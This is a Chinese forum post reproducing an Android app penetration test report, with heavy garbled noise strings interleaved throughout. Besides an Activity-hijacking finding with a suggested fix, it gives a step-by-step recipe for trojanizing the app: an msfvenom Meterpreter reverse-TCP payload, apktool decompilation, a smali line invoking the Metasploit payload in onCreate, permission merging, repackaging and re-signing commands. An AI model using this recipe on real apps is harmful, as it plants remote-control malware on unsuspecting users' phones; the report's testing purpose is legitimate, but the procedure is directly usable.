原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

admin · 发表于 2022-6-8 20:32:44

3 `, K* p' m( Y ^. D # e, o# U! n7 T3 w7 U0 g2 T
% U7 E! _# Y% F: c! ~1 M7 Z7 J9 `# Z7 P- h7 ~7 L8 ?1 R; W- x1 w

1 k _ [; p# O; M S& G7 V3 `6 Q 5 A! Y: B" a, L1 h6 c 文档编号： ~9 a/ K" k s/ a9 h$ _4 S! T0 ~" Z" t

' N4 v) v& R) l% [% o4 |- n) G( |1 A) u, S, A1 X1 K7 }# x " C# u# K* r3 ]: P# Q9 r2 u7 |* |& D* _0 y* ~! I- ?

! @; E2 Q$ q. s2 n2 L4 e7 [- K5 a P. Y1 R 3 V' C$ u: }& K4 e 3 ~& j9 A w8 U5 e7 ~/ ]

# @ g( ]8 W2 Y2 _1 c4 ~1 q2 s & B( |9 y, D: I& {' H 4 {: |1 H! h+ O* J2 f - i" h9 N" D2 s4 H! e& ?. |

9 _/ V8 v* a7 M- g0 i: L B6 k' Q" m1 P) U 5 E! \5 B$ o8 K2 w6 B- w: u) |" [- T, s

! H4 w9 c5 v7 V- ^2 ?8 u 6 o) }3 p/ s& X1 ~) y / [0 @3 G6 T' U- s " ]2 n5 W2 C6 j; h

' k" `. x9 j+ I' x& D4 J / i6 k& w6 R' F& D* e 某某某APP渗透测试 $ s# O6 e! q' E e1 \9 \- w( L' C2 A! v8 T) \

9 S1 S4 w1 j9 i, D% e5 c+ N * w" r4 R/ M5 [, q3 E% | ) ~) X- a8 o, [* F7 y2 m7 @ 4 A0 Q8 P( C C! R4 C

. ]0 f) `' m0 d8 }- s$ U/ B) [- @ 1 _3 S( `# _. a3 ^6 R0 n 2 C+ C: {% s$ A- q: m) n2 ~7 N7 b ' b+ w, T; E7 }% d

) D2 k/ D0 Q0 a) c" w1 s ; V/ n5 `, ^+ |1 o1 L * t+ n" H& g* B : q6 G# m& A% A4 l

, n# @5 k8 m4 c7 i6 `6 d: |0 ~& J( B* v+ w * ?7 Y7 a0 l2 t0 t6 } V5 v & }5 N% ~8 Y& l6 ]) `

+ C9 [5 p7 c3 k9 Q/ @7 C 6 O9 z9 [1 l: `6 ?. s 技术报告 ; B4 U. p2 V' z5 i0 \8 `" E. o$ Q# ~% Z8 V% q& [+ V* o

8 X% J; v8 ~2 t! V% U4 Q % ^. B2 }( I! o v3 v( E D8 O : G' |- |! L$ f. t8 p) S ; N% B+ |. w6 D7 y: F8 R( _

- k, J. v* ~3 k; d0 I4 s# O6 G- w - w% m+ L! `5 \* p, y. z1 ` " N5 `" d8 Y' a! s# Q9 k

8 {4 M& g1 t/ r: I+ T , N* L, o4 B5 [& b ) A8 {+ k4 X; r* A* a: j6 M) B# V5 L# v8 V7 N6 V' C

! j" X0 S' v$ @4 k# G. ~/ m( H. q; @6 g$ ~- F( D! `) _( B $ j) D6 e) b! b' a' ` : i( o1 y& h/ q" c# v( T

4 M2 K, t, h) c! J2 A8 [/ |$ Z ' N9 W% I. m1 u, f- M # ~) i; F! c+ L9 ]! V- i$ p 3 B1 v) u! [. z9 }

6 e% u+ y2 p. m. w 3 n! h j+ e2 d6 X+ h& n; l ' \6 R0 D" j1 ?: x7 O0 w0 a 2 K2 e+ R* l% z9 _5 J

' W* }1 j& h5 M ( X0 ?# }9 e9 b2 r7 r+ p1 A 8 h2 s; b# E. T$ R* i _4 }: M: o$ p/ T. j) ]

7 W# F% n n1 v; b" |5 Z- W 9 ^: b7 a4 n' a3 a! F( W1 O 2 q1 t' p7 h! D) L# j& D6 } ! C' Y8 d- p! r

0 u) z9 I9 S4 s, x6 g! x" R! P5 n6 S ; x" M7 T% T+ j# v C( w $ F# U1 ?" g# \7 x& \ . O: k0 E8 T/ i9 s' m) W! j

! q9 q- {, Z& l6 r. g5 F* \ * ]' ], @. l' b7 J ' R8 f1 j# o- G5 e) }* _ 9 @" A8 J# Z' N1 ~: N6 |: ?

" Z: j k$ p- }! ^ 7 |& _6 @. i h3 a! z4 S9 `, K # e% t+ }' k# v$ p8 C+ Q! k) ] - @' d( [- e2 g. a) ~, y

" |, K* R# w4 Z- `0 c' f5 v % a, ~ {0 X( B, c" w2 [ : w8 C [3 s/ Z& _/ n- j$ l9 M/ \( y5 Y! H7 S

. I# c8 a# m. W) c& _" } ( [; ^( P! t3 p7 ?% X. O+ F 1 Z8 `) Q6 q, r# y5 H , s5 r' q* }7 _8 t7 G& t7 H; B

; i6 x" S. D! B% m . q& B8 G$ W. T1 M! H/ X: i 9 y! A) n- Y {' M4 E7 n & e, e, j# v7 j* P

0 k) C. y: b, T: N @% O4 X' E: P7 s" a! i' f0 M5 g. T 2 ~1 \$ y8 [' _7 S9 b& u0 e- S O3 v" h, t! V* Q

( x! k) R1 M% ^3 v) [2 A3 I $ k. f# L0 F* D8 B. K' F 8 t# E$ }9 G1 _7 Q8 f1 E- ]+ z$ _ 5 Y4 E) K8 L8 V, j+ V4 D

/ V, b5 G7 X. |$ o * e& `$ D2 r" R* p/ C+ L% U {0 l3 \5 e B1 k$ I: s6 m% a ! t; N7 n$ L, j3 t

5 t* D6 @ S y2 ` ( G- Y% Q$ b" [( g 8 T" Y: V: ?! ? + @% c2 j: E+ R6 g

- F: B. B' c6 {. l6 r 0 ]2 s- D! U D2 i% G" k. C 二〇二〇年 6 `+ D/ M3 H9 c7 t + R' M8 B* j3 E4 n$ P+ P

+ ?6 [5 Y& X1 |8 N7 F9 z " y# J4 Q' H. J0 K* A2 X l 目录 1 I# M R' a4 z7 |, D 7 D h/ j9 `/ E0 Y, c# q

# |6 v# |. ^4 E # G; ?* ?3 q3 w/ P/ ~; b3 s) S 1 k# T& _8 T1 r* U# u0 |) M) {" I( Y7 U

$ ?+ Z( g9 |6 `0 e0 D& `7 n2 V 2 D& ]- L. N5 c; m- h4 @# e 1 概述... 3 $ Q* {+ H+ y, s7 q5 ~4 n , L+ |0 @/ a5 J7 R1 ~) Q5 k

1 Z) j: h0 c: V! L3 X : w9 n: x+ ^5 n9 u7 I0 N 1.2测试时间... 3 4 m9 H" T- o, f+ L, A/ a2 v4 k- q ) R* N8 W8 w8 I9 K- i

! r- z4 f) ]- c5 z7 W& K* Y. h! U* K2 q5 U& ] 1.3测试对象... 3 ' ?7 n. F _9 L: `: X* g" _6 c$ H! r6 i } }

; d9 U$ `! n" I 8 o I# f+ d' b* j+ n8 s' k 1.4测试结果... 3 ; w% t8 U/ y) }; d' k " L) W5 O. Y: S- \+ ?3 |5 K

( M+ f! y( D: l+ l4 m . a: K7 r" W4 V& V" x; m 2 检测结果... 4 + v4 f( r9 M8 i$ Q y2 S * f- U; a1 U! j/ O' P1 R5 m

7 M8 l& T' r$ `" {2 ]8 Y 0 l* R# A8 y3 S( Z) E 2.1 某某某... 4 . W. \3 Z1 N: B: }& N! s# x- c ' e* |4 t$ R8 E) d

$ R" A5 Q" c! K- y& l* r6 N. F& o7 p4 P' c$ J: a 2.1.1检测目标... 4 3 B6 z* Y# n2 \. h6 `( q* D8 I 5 i: g: K( [+ M/ R! d

V" {8 K" @! [1 E+ v; e. ~5 W2 }# e 2.1.2检测结果... 4 + [9 v: Q/ z& W7 D r( S( z4 w t4 R

! s0 ^: q; j; P3 u A4 H . B* n& P* n9 r6 L- _1 G% |9 J 2.1.2.1. 4 $ \8 E5 G. F/ ?5 f- ` ' ~4 {( t7 p1 M

$ d3 D4 x6 g+ N 0 ^* [' m* M1 P" u 2.1.2.2. 6 $ [7 y3 N9 ^9 [, N$ y 7 L# Y7 O' ?7 ~% M& I3 }9 U

' ^% Y2 |( S6 E3 u+ }9 _7 A+ z* A c2 t/ k5 j) `) b7 M9 Q 1 R- i2 j4 W& t" X# b % ~( t/ I' H/ ^+ d

! t T; A+ }, ^+ }* L7 C+ ]' U: d/ D: d0 z 1 概述 & j3 H: n5 z/ w' Y, j9 E/ I0 w* t 7 L+ l. Q# U+ v4 q4 u% Y) g/ n) g

: W- z0 L, P0 ] - c) ^4 c/ m( d7 x. ] 1.2测试时间 & \6 S& }1 e8 W) C3 B0 d9 I d* I- K( y" f( c" y6 Y8 }

. L! `& h x" D 9 \|6 P# \|* g/ N- O: H - I* ?0 w: t: ^5 N) E1 J, Z 0 ?7 F' S( {3 r$ S/ a' X0 Z$ n 渗透测试时间 6 Z0 o, v2 [) K( m ]1 z/ ]# g ; k; u7 C9 F) _3 e, b- N: U : @. W; t+ s3 j. A0 ^% P) \( t0 s 1 ?8 n: I6 i+ n
/ \|8 D, o3 z% c" R 2 j- K& d. I- @ ( p# _( P: H: o % G( `# F7 h- o$ A( z4 I5 G U 起始时间 4 [4 m4 B9 e1 u- e" j0 q: _ 6 l( Z* ]! W. o: B" Z# L g# W( a( `, w3 e0 d0 I7 p! P2 ~+ o1 a	) c) V$ ^) S3 a* r3 @: F 3 f! Y7 C) o. v$ k + t- y2 s: b# ^" }7 i! m0 u ' \|3 e; v, g; ] } 2020年4月6日 # d0 i' [8 D7 ^$ q$ A/ W. S' u p, R * ]4 E/ o" V5 m " Z# a0 a# m3 D6 s9 H2 A. e5 n& H+ \|
?/ X, z; u" H" Z }* f . ?, { e9 y! {, ^ 8 U% d2 x; j7 v; \ [# U) ? 4 f$ l) p* q r7 {7 u& y 结束时间 9 u% ]3 y* \|4 b4 [* G ; L( x- }7 U) u5 o$ T ( D4 ]1 f' k% u) g% z6 q+ v , z- j; Q8 T. h% a	' N1 h# K' `4 B0 q; C# D, K, X ! v; P# {& d+ w0 G; `( t % [* S: S' F0 [) }7 T( Z ! e% D( D* f+ ^( R2 K& f% E 2020年4月9日 " q! E( X( l' R" A' \. I& X' N n $ x6 \ N" b8 ~) A3 N1 {9 ]8 G/ C! L) d1 Y; C. e) s

& \* _' @, m& ?0 O" r; T $ A5 q3 y- k) _ T% o 1.3测试对象 $ s G, e) s& a, n. X" z) B; { 0 X/ q% Y% \2 |/ N3 Y9 s

# P' P" b. _' n6 |: Q ' a4 ^* q# ]" k. i9 I 此次测试目标为某某某安卓APP进行渗透性测试，APP存在安全漏洞数量如下表所示： 8 r: E$ p, r" U& z/ c1 B; j 0 L, |6 M# t( r0 e" }* q

6 }7 s, ^- ~3 x" g; h# q) c. ^ W+ D 表1-1 检测对象 , a% o8 ?% k/ v# H, C, `+ L( ?( W$ L & t q f# d1 K1 ? E

; D w1 Q( n1 Q) C& \|: j; j _! D) f S E5 b( ~* _+ G6 o 2 f' `9 a1 [; o0 h" x8 {! ] 2 E/ V0 L8 M- c) M: q 序号 . O2 t5 d) o, F1 F5 L3 Y4 X+ {2 ?; K( \3 }+ U: M- {; z5 b % H: X* f K; K' `& C3 s; d5 t& I & ?, H) D* E+ @3 M+ K; \5 x	2 u& M2 n8 }6 _0 D* c" y/ T/ L, x9 m+ P# Q! ? ; J9 Q$ O) Q" U0 G) y $ c% i8 s* d) q* ~" `' h 测试对象 4 x/ A8 I/ p5 R5 l% c: N* r6 u) t 1 ]/ v. D8 H( ~' O* _) r2 b7 z- p7 E3 O, [+ [# n0 u" A/ [4 _	; \; H3 E e' J$ g, K4 f/ f3 O " @2 @' L# \|. F, g S , k( a4 \) T) A, \| + Z7 [: c! E& C1 m8 {- y 测试地址 - \: K; g; O0 w" L1 F1 ` ) y1 P$ J0 k; q1 u1 q8 \|! @ ' g: L: ~, ^, B: V; n* \ 5 x2 A0 w) y% x& \|# ?7 d n6 Q5 \|	6 H& R3 B+ F7 H8 o7 f0 [8 T1 A" k 7 ]0 n9 [# I& g2 ~: U0 m, W + Y8 x: [$ \|& _+ { * e$ N$ R4 S9 k0 W" c 安全漏洞 8 W+ i+ I6 N! j b" l3 B$ x , D3 d5 [0 m) L7 F& t % A( L7 ~# C3 Z1 `6 M0 H3 D " ^( @. ?4 Y; H% K& p, G
' ]# q2 E5 E) ?; J' i$ K G% M8 b( ` m$ Z# G ( W0 B& v, i. \|. K; @& [+ n, t$ g# A6 a 1 ' p/ z. u6 H8 m7 P8 Z 4 x' b$ v5 j: R2 D% A2 V * v1 L% W: W2 ?2 Z1 K; l / i* q4 F% I) S0 b3 w	A( H6 ]) N- y& Z! e. w2 Z , n2 F1 t0 Q' n" T! X # H# P" k& U: r- T6 I; b T ! F% @& i, q, B0 d 某某某安卓APP 0 D, O7 E+ P- D" u& P3 ?- M % d3 j9 M( @& ~; j/ f; w 5 \|2 \; k2 v: N ' L4 Y% S4 n( b/ N	1 X0 B1 E V& \9 v, \ K% t; ^; x7 C; @+ Q 1 U7 v+ D+ @; v9 y% i+ [8 Y4 e8 X8 {7 m* m X" c% n ; K' E. q& ]- ^& o" `) M; _ & s) K! ^# s: ~$ H ( h7 d" K# w: i% m6 I) I- w% g . Z0 d) M% v; N	8 Z: k0 Q3 l( W 7 w$ [; H! i2 {7 J* L/ K& ]/ q $ ^* X( C7 H- T5 y : \|- N3 D( @" x* D 2 " R% g! j: j* @' ]! E3 k " g4 _% u [/ V/ V8 J9 [ \|1 c / W4 `9 F" G5 \/ R, x5 y7 ]7 k ?3 g v9 j' \1 r

6 C& H- G& r1 A1 A % y3 l* E( n0 J" h7 l5 ? 1.4测试结果 6 G/ F. d' d0 q4 e1 x4 A! H 4 [! e, q ~, z6 e6 N% d: K! h

1 {! S4 j% I4 D, k, x3 t 2 }+ \% t" M0 X, l7 e) T* e4 f7 O 在本次对某某某APP透测试中发现，APP安全防护存在一定问题，主要问题如下所示： 9 o- T' I0 r( H- I$ o# g; X/ w3 H( h" r, L! G) I, A: q4 ~

( f0 z& J. L9 [2 { 0 m! L: ^& k0 Y - o# y5 G; c+ z) V2 K" |: I# I/ F# G% K: [2 E( x; V

2 Z; e; m- W/ t! A ! i+ A: B9 n4 u2 ^. E 序号 # f3 ], j5 i4 {1 C' v" `( b9 X % y; G! a& f% j* _) D- n6 L" l% U; W

1 v' i* X% y: n4 w& u+ g ! a) X/ T& N1 G% d5 m4 b 系统名称 ( l x. B) {- G0 M 9 F4 M- \& e* W+ `9 }

, }9 B6 ~$ K, k$ W6 Z' U5 T7 F( b4 a+ d: o* p& [& R 漏洞名称 % J2 ?# Z, m2 A; J% I- A; m9 R$ @

f( C. M: z6 F9 c+ o t $ e' n% v' i3 i8 b 漏洞危害 # `2 R9 g! }8 h7 P) A+ ]; X : \" Y4 j2 B- O$ C$ e, S

* Y }# o0 U$ a7 \ 9 V' x. |. l$ v4 \! R 修复结果 / n3 T4 Y% q" F* E. _3 V8 H" _2 E4 ^5 `8 w. t

% }6 f- i8 O: _% P! P . I: K; [8 \$ d8 X' \* T 1 ! Z6 t7 _6 F6 H; C4 K: U( _5 m* |

! ?6 ^* @( n9 A* n0 U$ ?; ?3 ]( g9 W . y. \; U M5 m, u; m/ p0 A 某某某某某某APP 4 Q5 j4 l4 K1 I) q 4 _" o3 [, F3 C2 I) G

5 Q- Y! r6 k+ o% |6 P* d% S) B5 p7 g3 {7 l& h7 w5 Z7 v% U% s! R3 N Activity 劫持 - C, f) D N" h% E' j( Y + z5 G9 F. w) z% V% D+ M+ k# S

- q" |# y& C1 v* t+ [ & P# [5 b& E8 ?5 E+ r( n/ e ' }( ~3 x& D& q8 b9 Y f* M) c( `$ M7 f. t- T8 s

& n, p c- E `- ?, ` ) h. W6 R( ^2 O# @& [3 k% b 高 $ m" v% i: j; U+ K# u . ?4 y/ F3 S9 E2 j1 n

1 C( _9 W7 n/ M( [2 U# U . _$ G# w2 L9 l3 P1 \9 k& e3 H ?$ Q1 h# {9 D , d: _, j, k1 ]0 Q9 [

" Q6 [, l7 T; I [5 d. t3 C& \" {$ Y' T2 h$ x7 C: n 2 " ^$ y3 [" d4 R' R/ ~ ( M2 h& p2 `' v+ y; J- n- i

" `: R% s/ f8 ~2 l! { " i( Q2 r( I4 z+ g 某某某某某某APP _. h9 T0 k) G% H' ]$ ]( l) h% \5 {) d5 {: O- I- J

' \# h4 ?& V, J' h% j7 C' { 4 h+ o. v- y) b6 d: X0 t 反编译二次打包捆绑木马、篡改APP代码 % h; e1 O+ K5 D$ Y0 G: E: B5 A+ c. L. V

! j5 f9 M. `- e; M- \) F 4 G2 L1 s2 h4 k; C 高 % h7 @% T4 ]% V+ L! @! l 8 m+ B/ M: X7 e; [8 v

; |& c8 V/ m& x* ~) a6 D7 V% g8 v, l & v3 z4 M9 z7 [/ t1 G: _ J5 A 7 ^8 }. u/ a6 a! T# H0 [/ l( F

9 k% s* }, `3 s6 F3 L8 I 9 X( @# j# _' e8 y/ o + p) y6 W; W" M3 K8 v1 I ; L. c1 y4 C3 m% N. ?

2 T: y5 ~4 R1 H, i @$ q8 c1 ?9 M7 a. ?+ b& x9 y* z 表1-2 测试结果 * g3 v! E" b: Q6 }! `1 A' {1 M% d7 K C) Q" V* u' o3 k# e2 d- n- ?

2 R) `5 C; P- l7 t5 Q- s e1 ~; m5 ~/ e " t7 a* v- m" C' n/ L+ d3 I - L$ L" A4 b) y( @: X/ L) K

+ t6 \5 p# f* ]# w( Y) D7 B& ? * c% ]+ s) I# T y 2 检测结果 * \ n" `8 {/ i; l2 m/ t) c2 [8 } ; g! v$ @5 u1 x r/ R3 `, l: R

+ B: ^; P a) a5 ?) J9 x6 T # B/ |) E/ s! v( L7 S 2.1 某某某 ' c8 e7 y% `9 ^$ ^ % X: g0 t) ^: M% i

8 u7 F3 J7 |3 D" h, o 0 p) R R; f/ b 2.1.1检测目标 2 I6 {1 B: k# d8 ~9 B e+ Y$ [+ A, o

1 \; o/ }; m$ M/ J6 Q4 @4 T* B. q $ R J+ r9 n& g6 X 目标地址： 某某某某某某APP 4 L" L7 a; X7 `% W& Q- i: M , \: }, N& Q) N

5 r# Y0 c) j& b9 ] % [! [; Q6 @7 d' h* [' ~7 h& J 2.1.2检测结果 * Y5 a* ]% ~& U1 R; X# M/ J2 p. F+ J; i! V+ R

# Y( `. T+ D6 {+ K1 \; u! s6 M , C( G E5 P/ W) I# v' F 2.1.2.1 8 b4 N6 n9 l4 H# U& y7 d : O( l$ U" l" ?- L& C) j; A

* H o* P. k+ J- `6 b) Q2 \. B. x9 K+ w 漏洞链接地址：某某某某某某APP 0 Q2 S0 @1 O5 b5 e6 L- Z+ [' e. {2 k0 {

/ T5 N! G. D$ X' p5 a3 g# N9 g ( R; ~: C, a* ?* | T 7 D: l2 J2 }+ @$ v ( d9 T+ j; i2 y8 H+ k! p) w/ q7 t

0 v* Y0 G# i% T1 v8 } 9 ]' w& @8 M! q7 ?- R8 a, o/ x 漏洞分析及取证： 9 }$ w& Q* _, X* y # H" E; l4 q$ x2 M: t

" f) z0 I( f9 q: i( j' o2 s6 Y + w- A8 ~( x u- T 通过androidkiiler反编译，发现app未进行安全加固， Activity 为com.minivision.cmcc.activity.SubActivity可被劫持，复现漏洞如图： , y8 z! u* t7 K' \& i/ [, e' x7 s3 F2 C1 v$ d& V3 G% M

0 a) P, W+ \; P `+ y2 U! m1 r! ]3 j! \ 2 m H) l/ N. _9 C a {/ ^+ \3 U1 m" u7 D1 H" B, M8 h

9 N9 o0 }# |7 b1 i* V1 m1 |" @! n( E) t- T M + U6 `. e" Q0 w! n. L ' h; ~. F' D) W# C( k& L5 Y Y& |

1 @' O9 L8 }+ |3 e ( O# d Q8 Z# [1 g$ L; v- D ) k0 M8 a* Q2 I1 o 1 A1 | T2 h7 s4 W7 {6 C

0 ~4 S3 b8 d6 ^1 x6 f3 F4 Z. s+ X' g8 \2 m0 {- p% ` 9 s3 R% m& E, A) j7 N1 A' J6 Z ! e- u7 W$ [6 F' [, W" y; \* L

, q* a# U( ~' C0 X; W/ c 8 d5 U% `* t% L/ e7 i( T& U! Z ! j9 s4 _0 z2 h 2 L$ ^/ Z' O! C3 }, u% }/ `; c

: t8 j) L+ @/ t; I - W( e8 m- Q: |3 k 漏洞危害：高 : j$ f. Y1 Q" t" v1 G $ g2 l( L( @) k

; q9 T. J; p5 f% ?( E" f5 t! x* ]7 @9 U5 `" M6 t ; ?: s/ f k1 N- d8 g) `. y7 U ; D& d, x% Z. B$ \| 严重程度 6 T3 L* V( e+ U- \|; R# ` 8 F" X2 ]6 Z+ @) c : X/ d, N$ F: v * @$ k$ E! t6 p4 _	# _3 {( a; b! i$ u. Q 6 ~# c c0 c0 F& Y( G$ x7 u ; M" z3 B" d0 G9 O' Z7 S: A# m $ t5 q/ Y& M% \- w 高 ; ~% D" b+ J4 z' U % X+ u4 v8 Y0 _( g( K1 D' u . I' T: s% O- @" p" Z5 \|- M- r1 W0 v# }6 }, g2 C& S: a. w6 f	) ~9 K% z/ l8 e7 r Q4 }. ]/ \ # J0 X& r1 G! k: o 2 t! f H# C6 i/ Y" D" H6 ]2 j f" R' t2 t9 l0 P ■ ; k& S! [6 l' m8 N" l% Z ; Y5 G; i* \| c6 l o7 {/ _1 \|/ J8 d X ! I( f$ t: v" {( H	$ u9 M# }6 T* I3 o: k2 C( U , o/ E- d4 v# w4 d8 Q: B 7 {- T) \|+ Y1 r. H2 r% V2 s" p" E: h1 g7 x2 R. u 中 " ]9 @( o8 ^3 ~- p: g1 n) t- V* ?; I( Y- U, l ( i$ A4 a: T2 \|$ f# F* T0 h8 I' v/ \|4 H	5 v9 m9 j6 m; \4 W 9 F# B& ~ Q% ]6 ] : R6 a8 W: U6 a5 q( i" g 8 \|: O, v( ]& c) @$ K5 N: B ! k' Q$ r# l) X$ w) f4 K9 K' f/ z& j o) u( S& @) r8 }/ T 9 o0 `6 q% w) @! _0 A) _+ o 6 G1 p% O! @4 B# u( ?7 y	3 \+ u7 v) X$ ^8 @( R7 z" {! Z% N/ D' c# Q! A" u # W$ v: j4 F [3 w: d5 l! ~# h3 C4 h9 l a; Y 低 ) R1 Q8 [% g& P/ A1 C7 j# H+ _$ C % u1 r3 }& r' t$ D5 @; G- W i - ?) L. x L. e6 n2 ~, M 4 z. E6 q: R {% [	; R! G# f4 q0 y X 6 ~- B# n+ T8 s7 \|# L+ ? 3 v; w! J- L# q6 c6 Z5 p1 m9 {! g7 [9 F" ^ + v5 ?+ O* K% a; J5 }& f : N# F; n% D* U 3 Z+ `6 v/ S% D) F6 F ( v. L. d, g) A0 G0 n

3 k! e# Q9 {" k5 d. m : J+ e3 b4 ]5 V9 I* Y : h9 L0 u; W& N. K: s1 f3 j# e " U+ b$ `1 R" r& t0 {2 G) e

4 ^% Y. F) M" o' ?- G$ ], p1 z0 d& C O8 O* |' r, v 修复方法：在 APP 的 Activity 界面（也就是 MainActivity）中重写 onKeyDown 方法和 onPause 方法，当其被覆盖时，就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的（触摸返回键或 HOME 键），如果是用户自己触发的则无需弹出警示，否则弹出警示信息。 ' H% w9 u; P% A6 F- v j " Z, t! `/ C' m8 A! W1 o

0 v1 J' p% s0 a/ r- B9 W0 S ' Q. j: a9 \1 e7 [: X5 T , I5 O" j! I) K {" C, P. C3 g. g1 H. L2 \* z; i

4 W: b4 T. A( |* ? * ]# k- Y, N3 L5 U) L 2 f& B7 F( E1 w6 e! s& G+ ?0 X9 v( {

; k- }, I$ t3 x 9 T/ |9 T8 T- i4 s 2.1.2.2 ) q# P( D5 O4 F: n! A" B7 |- @4 q# p9 V: l5 l

- i5 m' A5 w2 h 6 V+ U# `+ j4 V7 J 漏洞链接地址：某某某某某某APP " |2 x5 M& I$ _1 T/ F7 c + t ?4 z# Z2 r/ M

) D# p' C7 y$ K: S - W& o# ~, m m' U- x 漏洞分析及取证： h+ h2 T9 \& V4 P A" X4 F ) g* v X* m4 U" a

6 E3 F, }3 g3 W: {, F2 R) k ' K5 u" {# A# Y6 K! ^) Y5 q K 通过反编译，发现程序未加壳加密，可直接反编译获取源码，经过测试可修改app代码捆绑木马或者植入广告等操作，复现详细方法如下： % d L4 s: W! p8 g + I8 k3 t* c: Q; P/ G2 s

. ~0 V1 j* i( q7 g ; ]0 n1 M6 H% L 用Metasploit 生成木马 apk % q$ _" O# t: r! E; V. j( V0 `1 T( H, s/ [. T1 d! {

. q' S. v R1 W! m0 _( a+ T2 T, Z2 ~8 h # v/ j& P+ B) s6 h% h7 n7 | msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk / E" U. R- b" u; [/ y ; ]$ F+ M5 m. M1 H$ a

5 }0 c$ R9 U' e3 w; U' G ! D( [$ D$ {2 [5 Y8 i 反编译目标apk和木马apk & G: l }5 U( ~ 8 a" B; A# h: ?5 t

9 [4 h, s, T* F9 ?( t: A ' M, Z+ \, c6 S$ n9 B apktool d target.apk
' M% Z$ ~& F6 F 4 e" G* E/ Z3 O apktool d cockhorse.apk . y1 W2 F3 _% B: A% g( @3 R: e # ^$ G# U) f/ K& a7 K! q0 W

2 G- z, S7 O) ]7 V8 [+ D9 s" f , O# l! `6 N9 A7 n& C) F/ Q' f/ J 木马 apk 注入目标 apk + U: x: f/ p3 D! U4 w; E8 n; f: b + l$ ?1 }* }! m: G+ [

& l4 C- k5 h: l; t: b . N' M1 G: C& E D& b* Y; { i2 I 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件，并在 onCreate()方法中添加如下代码：
+ ?1 G9 w1 E4 u8 l" Y 0 y+ g1 f) j. o0 l& Y, M invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V * M8 ]) \8 l! b ) y, F3 t; C$ Z7 X9 G3 Y% F9 ?

- ?; b' |$ A8 j; N " |* B$ [' \( d, n+ G0 C' v8 G* U 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中，去除重复 7 o6 C# U d+ l: j$ V 2 i& L" V/ `: ^6 F% Y

- Y0 D: R! E% M0 L. M+ Y ) w6 C5 U5 R9 w# y. } 将木马文件的 smali 文件放到目标文件下，例如 com/metasploit 文件复制到目标文件 com/ 下 : {4 \, l6 d* b& y ' D3 d: N7 v. Z# Y) q

% s$ b2 v7 S$ A2 T6 s 6 m8 w5 p. c+ D4 Q0 L3 ~0 c 回编译生成最终 apk 0 x! W2 E/ s0 B% p 4 F- X6 J. Y9 N3 x

7 M, _+ \ {( U e - Y' b' r3 R* S; _) \$ o( u4 @) w 重新打包 9 w% Y5 ^5 K/ J" ` , k6 {9 C* z' j. K+ w! |( T

* z7 \- _# I% J* C; _, X9 e 3 i) W/ R; [3 w7 C3 c apktool b -o repackage.apk target_app_floder 4 w q* j+ b, T! |2 K + F% [9 o! a4 V z- R

( }6 I7 p4 X- N! g5 M; ^ % M" V5 \6 m. l7 E/ h' J 创建签名文件，有的话可忽略此步骤 : v1 B/ h2 O% G 5 ~* n" {7 k5 u: e* {( ?" |

' g6 I7 W, z3 H4 U/ r l* _/ K$ j ^7 a, c& q/ Q8 A keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 / p" ~- ~9 L# z# g: V! A! b% G: G7 }: q }

! w( ~ }" g& ?) V 8 |/ P( h. l! m3 e6 S1 V 签名，以下任选其一 3 B4 q$ }1 Z' H) ]- S5 w 7 d6 K2 m* s3 b/ V/ [8 z

3 L$ N. \( h8 j$ y# i: y7 g; j 9 a, b/ E$ }' T0 A: B4 {5 ^( q jarsigner 方式 % J) I2 r7 J5 {0 R, @0 h2 [; v0 }+ l1 H. |* r0 G

, s0 u0 O$ Q; @- G 8 M2 C* P% q6 r; l, K3 Z jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname ' h/ b9 |. w. N 4 Q# l& C: Y. i& @) E4 f' ~

! M* ^5 Q' n6 M! g. | , X( v8 H/ a9 H: C7 y7 w apksigner 方式 3 c- C. G9 i7 o+ z % S7 P: d6 C2 x) V' ?6 ?% l

5 [" @1 W) D, _+ ? ( N* o @" N9 Z7 \# T/ V( Z6 O0 R apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk Q4 k8 I, }) ]- ^: T8 N 4 u# M( @! }% O" o

6 N2 s5 _1 a% B8 q( Y6 \9 G 8 {9 q/ Y$ o% [0 I' G& h1 b/ { 如需要禁用 v2签名 添加选项--v2-signing-enabled false 3 o2 y2 `" z6 c6 Y* O $ i U. | q- \# F, B$ c$ M

4 p- O) x6 Q7 C. G# \ 5 C2 \1 a" n$ f5 e 验证，以下任选其一 2 d3 U9 ^7 m3 o& q0 G& @. W * o5 ^2 S5 t# D3 v

& s: F, F5 V) v' |; w* @" X- a# @9 w6 ? jarsigner方式 & N* u4 i8 |/ r% }% K* w) w- T m * l) P6 [/ v1 h" d

; p' u4 `) Z* ?$ x& E4 u + u' ]- R2 K# x jarsigner -verify repackaged.apk / |, N& \' H- ?$ D. @ ( v0 ^; k5 E: f

/ z3 v; z. B( x2 {7 ?: `4 \6 o/ S- X% I) g8 K! f; \# ^/ w apksigner 方式 ) _) v( q) l1 S0 N: O) [# s% o% V. f* B; Y

" U0 F( L9 W5 Q( J1 C$ w$ j% y( w 7 }: Z! S0 F- p/ |) |' L apksigner verify -v --print-certs repackaged.apk # x$ I$ y+ J) }: T+ @2 u' u5 I ( x' U8 f) b" H% U3 e

$ Y5 D' X4 |7 A, y0 R- v( F" J3 q$ e . H5 y8 ]0 D* }( k keytool方式 $ Q7 @7 T$ ]& ^+ ]4 O; l 2 Q8 D0 M `3 E* u7 h' r

9 u( q. S0 D+ A; J$ n3 V2 o% O0 Z, w9 F* u1 V keytool -printcert -jarfile repackaged.apk ; `% F: _* V" V* w ) M$ }2 _ o3 L/ m5 w% B1 r

' A( n8 g6 j9 @, s* `% F7 A Z+ h8 B8 W! u/ B# u- i* z 对齐 " g" U$ d1 Z/ l ( S2 O0 y' U' `& ^

& b& U0 |0 f1 x" \* C 0 m# x4 Z5 _) F" w 字节对齐优化 ( D; O" n: z, p9 z) b1 z0 O6 m3 a$ H9 F' m

